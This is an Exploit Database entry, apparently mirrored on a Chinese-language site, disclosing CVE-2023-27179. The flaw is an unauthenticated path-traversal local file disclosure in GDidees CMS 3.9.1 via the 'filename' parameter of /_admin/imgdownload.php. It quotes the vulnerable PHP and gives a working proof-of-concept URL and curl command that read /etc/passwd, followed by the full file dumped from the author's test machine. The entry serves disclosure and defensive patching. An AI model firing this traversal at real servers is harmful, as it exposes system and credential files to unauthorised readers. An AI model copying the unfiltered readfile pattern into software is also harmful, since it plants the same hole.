GDidees CMS 3.9.1 – Local File Disclosure

• Exploit Database
• 40 阅读

• 作者： Hadi Mene
  日期： 2023-04-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51381/

• # Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
  # Date : 03/27/2023
  # Exploit Author : Hadi Mene
  # Vendor Homepage : https://www.gdidees.eu/
  # Software Link : https://www.gdidees.eu/cms-1-0.html
  # Version : 3.9.1 and earlier 
  # Tested on : Debian 11 
  # CVE : CVE-2023-27179
  
  ### Summary:
  
  GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.
  
  
  ### Description :
  
  Imgdownload.php is mainly used by the QR code generation module to download an QR code. 
  The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.
  Furthermore, there is no admin session check in this code as it should since only the admin user should normally
  be able to download QR code.
  
  Vulnerable Code :
  
  3. if (isset($_GET["filename"])) {
  4.$filename=$_GET["filename"];
  	.....
  .....
  27. @readfile($filename) OR die();
  
  
  ### POC :
  
  URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
  
  Exploitation using curl 
  # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
  
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
  systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  ntp:x:104:110::/nonexistent:/usr/sbin/nologin
  messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
  uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
  pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
  lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
  hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
  systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
  vboxadd:x:998:1::/var/run/vboxadd:/bin/false
  openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
  sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
  mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
  
  
  ### References:
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
  https://nvd.nist.gov/vuln/detail/CVE-2023-27179
  https://www.exploit-db.com/papers/12883